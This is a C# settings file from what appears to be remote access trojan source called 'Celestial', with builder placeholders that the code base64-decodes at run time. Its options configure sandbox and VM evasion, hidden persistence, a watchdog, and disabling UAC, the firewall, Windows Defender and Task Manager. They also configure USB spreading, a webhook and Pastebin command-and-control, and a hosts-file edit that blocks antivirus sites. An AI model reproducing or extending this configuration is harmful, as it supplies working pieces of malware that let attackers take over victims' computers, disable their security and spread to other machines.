using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace celestialC
{
    public static class Settings
    {
        public static bool isServer = false;
        public static string password = "";
#if DEBUG
        public static string isLotl = "false";
        public static string isServerVar = "false";
        public static string passwordvar = "P@SSw0rd";
        public static string askInstall = "false";
        public static string MutexName = "Celestial_guccigang1";
        public static string DetectDebugger = "false"; 
        public static string DetectSandboxie = "false";
        public static string DetectSmallDisk = "false";
        public static string DetectXP = "false";
        public static string DetectVirtualization = "false";
        public static string needInstall = "false";
        public static string InstallFolder = "%appdata%";
        public static string InstallSubFolder = @"Celestial";
        public static string InstallName = "ratka.exe";
        public static string InstallMelt = "false";
        public static string AutoRunMethod = "none";
        public static string TryAnotherIfFails = "false";
        public static string AutoRunhidden = "false";
        public static string AutoRunHighest = "false";
        public static string RegistryKeyName = "Celestial";
        public static string NameInTasks = "Celestial";
        public static string HideEverything = "false";
        public static string HideEverythingSys = "false";
        public static string DNS = "127.0.0.1";
        public static string Port = "3333";
        public static string ClientTag = "Me";
        public static string UsePastebin = "false";
        public static string CritProcess = "true";
        public static string PastebinLink = "none";
        public static string Watchdog = "false";
        public static string Watchdogname = "watchdog.vbs";
        public static string Watchdogloc = "%appdata%";
        public static string Needadm = "false";
        public static string disabletaskmgr = "false";
        public static string disableregistry = "false";
        public static string disableuac = "false";
        public static string disablefirewall = "false";
        public static string disablewindef = "false";
        public static string disableCMD = "false";
        public static string usbspr = "false";
        public static string usbsprname = "svh.exe";
        public static string Cblack = "false";
        public static string Cblacklist = "EN;UK;FX;ZX";
        public static string ARecovery = "false";
        public static string defaultWebhook = "";
        public static string chromekill = "false";
        public static string HostsEdit = "false";
        public static string HostsList = "127.0.0.1|c3lestial.fun;127.0.0.1|antivirus.com;127.0.0.1|trah.com;";
        public static string LibFolder = "%appdata%";
        public static string LibSubFolder = "CelestialLibs";
        public static string DisableRun = "false";
        public static string DisableWinKeys = "false";
#else
        public static string isLotl = Encryption.Base64Decode("[%isLotl%]");
        public static string isServerVar = Encryption.Base64Decode("[%isServer%]");
        public static string passwordvar = Encryption.Base64Decode("[%password%]");
        public static string askInstall = Encryption.Base64Decode("[%askInstall%]");
        public static string MutexName = Encryption.Base64Decode("[%Mutex%]");
        public static string DetectDebugger = Encryption.Base64Decode("[%dbgdetect%]");
        public static string DetectSandboxie = Encryption.Base64Decode("[%sandboxied%]");
        public static string DetectSmallDisk = Encryption.Base64Decode("[%smallcock%]");
        public static string DetectXP = Encryption.Base64Decode("[%detectmamont%]");
        public static string DetectVirtualization = Encryption.Base64Decode("[%detectvirtualization%]");
        public static string needInstall = Encryption.Base64Decode("[%needins%]");
        public static string InstallFolder = Encryption.Base64Decode(@"[%installfolder%]");
        public static string InstallSubFolder = Encryption.Base64Decode(@"[%installsubfolder%]");
        public static string InstallName = Encryption.Base64Decode("[%installname%]");
        public static string InstallMelt = Encryption.Base64Decode("[%installmelt%]");
        public static string AutoRunMethod = Encryption.Base64Decode("[%runmethod%]");
        public static string TryAnotherIfFails = Encryption.Base64Decode("[%tryanother%]");
        public static string AutoRunhidden = Encryption.Base64Decode("[%runhidden%]");
        public static string AutoRunHighest = Encryption.Base64Decode("[%runhighest%]");
        public static string RegistryKeyName = Encryption.Base64Decode("[%regkey%]");
        public static string NameInTasks = Encryption.Base64Decode("[%nameintask%]");
        public static string HideEverything = Encryption.Base64Decode("[%hideevery%]");
        public static string HideEverythingSys = Encryption.Base64Decode("[%hideeverysys%]");
        public static string DNS = Encryption.Base64Decode("[%dnsip%]");
        public static string Port = Encryption.Base64Decode("[%port%]");
        public static string ClientTag = Encryption.Base64Decode("[%clienttag%]");
        public static string UsePastebin = Encryption.Base64Decode("[%usepastebin%]");
        public static string CritProcess = Encryption.Base64Decode("[%critprocess%]");
        public static string PastebinLink = Encryption.Base64Decode("[%pasebinlink%]");
        public static string Watchdog = Encryption.Base64Decode("[%Watchdog%]");
        public static string Watchdogname = Encryption.Base64Decode("[%Watchdogname%]");
        public static string Watchdogloc = Encryption.Base64Decode("[%Watchdogloc%]");
        public static string Needadm = Encryption.Base64Decode("[%needadm%]");
        public static string disabletaskmgr = Encryption.Base64Decode("[%taskmgr%]");
        public static string disableregistry = Encryption.Base64Decode("[%registrytools%]");
        public static string disableuac = Encryption.Base64Decode("[%uac%]");
        public static string disablefirewall = Encryption.Base64Decode("[%firewall%]");
        public static string disablewindef = Encryption.Base64Decode("[%windef%]");
        public static string disableCMD = Encryption.Base64Decode("[%discmd%]");
        public static string usbspr = Encryption.Base64Decode("[%usbspr%]");
        public static string usbsprname = Encryption.Base64Decode("[%usbsprname%]");
        public static string Cblack = Encryption.Base64Decode("[%DetectCountry%]");
        public static string Cblacklist = Encryption.Base64Decode("[%DetectCountrylist%]");
        public static string ARecovery = Encryption.Base64Decode("[%needrecovery%]");
        public static string defaultWebhook = Encryption.Base64Decode("[%webhook%]");
        public static string chromekill = Encryption.Base64Decode("[%chromekill%]");
        public static string HostsEdit = Encryption.Base64Decode("[%HostsEdit%]");
        public static string HostsList = Encryption.Base64Decode("[%HostsList%]");
        public static string LibFolder = Encryption.Base64Decode("[%LibFolder%]");
        public static string LibSubFolder = Encryption.Base64Decode("[%LibSubFolder%]");
        public static string DisableRun = Encryption.Base64Decode("[%DisableRun%]");
        public static string DisableWinKeys = Encryption.Base64Decode("[%DisableWinKeys%]");
#endif
    }
}
